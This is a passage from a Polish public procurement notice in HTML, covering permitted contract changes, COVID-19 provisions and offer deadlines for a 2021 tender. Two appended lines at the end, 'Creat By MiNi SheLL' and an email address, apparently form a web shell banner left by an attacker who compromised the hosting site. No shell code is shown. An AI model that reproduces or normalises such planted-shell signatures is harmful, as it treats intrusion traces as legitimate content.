dotyczące<br/>sposobu składania poszczególnych dokumentów i oświadczeń przez Wykonawców<br/>wspólnie ubiegającychsię o zamówienie opisane są innych właściwych miejscach w niniejszym<br/>ogłoszeniu oraz w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zmiana postanowień umowy może nastąpić na podstawie art. 455 ustawy Prawo zamówień publicznych z dnia 11 września 2019r. (Dz.U. z 21 r., poz.1129 z późniejszymi zmianami)<br/>2.	Zamawiający przewiduje możliwość wprowadzenia zmian do postanowień umowy w stosunku do treści oferty, polegających na: zmianie wynagrodzenia, zmianie terminu dostawy oraz zmianie personelu Wykonawcy.<br/>3.	Zmiana wynagrodzenia i/lub przedmiotu umowy może nastąpić w przypadku, gdy:<br/>1)	nastąpi zmiana urzędowej stawki należnych podatków i opłat, w szczególności zmiana stawki podatku VAT.<br/>2)	nastąpi zaniechanie wykonania części przedmiotu umowy z uwagi na okoliczności nie leżące po stronie Wykonawcy,<br/>3)	nastąpi zmiana przedmiotu dostawy w stosunku do zaoferowanego przez Wykonawcę w ofercie, pod warunkiem, że zmiana przedmiotu dostawy nastąpi na skutek braku dostępności zaoferowanego przedmiotu na rynku polskim oraz dodatkowo, że zaoferowane urządzenie zastępcze będzie posiadało parametry techniczne nie gorsze niż urządzenie zaoferowane w ofercie Wykonawcy<br/>4.	Zmiana terminu dostawy może nastąpić na wniosek Zamawiającego lub Wykonawcy w przypadku:<br/>1)	niezapewnienia przez Zamawiającego dostępności miejsc dostawy zgodnie z harmonogramem zatwierdzonym przez Zamawiającego, o którym to obowiązku mowa w § 5 ust 1 pkt 2 niniejszej umowy.<br/><br/>2) wystąpienia obiektywnej przeszkody, niezawinionej przez Wykonawcę, uniemożliwiającej wykonanie montażu przedmiotu umowy w miejscu dostawy <br/>3) wystąpienia konieczności uzyskania zgód i lub pozwoleń, które nie były przewidziane przez Zamawiającego w chwili zawierania niniejszej umowy<br/>5.	Zmiana personelu Wykonawcy może odbywać się na jego pisemny wniosek, za zgodą Zamawiającego.<br/>6.	Zmiany, o których mowa w ust 3,4 niniejszego paragrafu zostaną wprowadzone aneksem do umowy.<br/>7.	O zmianie personelu Zamawiającego Wykonawca zostanie powiadomiony na piśmie.<br/>8.	Strony dopuszczają możliwość wprowadzenia zmian w umowie w przypadku gdy niewykonanie lub nienależyte wykonanie umowy będzie spowodowane zachorowaniami na Covid-19, na zasadach i warunkach określonych w ustawie z dnia 2 marca 2021 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">5.	Wykonawca składa ofertę za po pośrednictwem systemu dostępnego pod adresem: https:// ezamowienia.ms.gov.pl i pod nazwą niniejszego postępowania. Sposób złożenia oferty został opisany w Rozdziale XI SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-29 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami<br/>RzeczypospolitejPolskiej, wymagane dokumenty składa się z uwzględnieniem postanowień<br/>rozporządzeniaMinistra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowychśrodków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądaćzamawiający od wykonawcy (Dz. U. z 2020 r., poz. 2415).

Creat By MiNi SheLL
Email: jattceo@gmail.com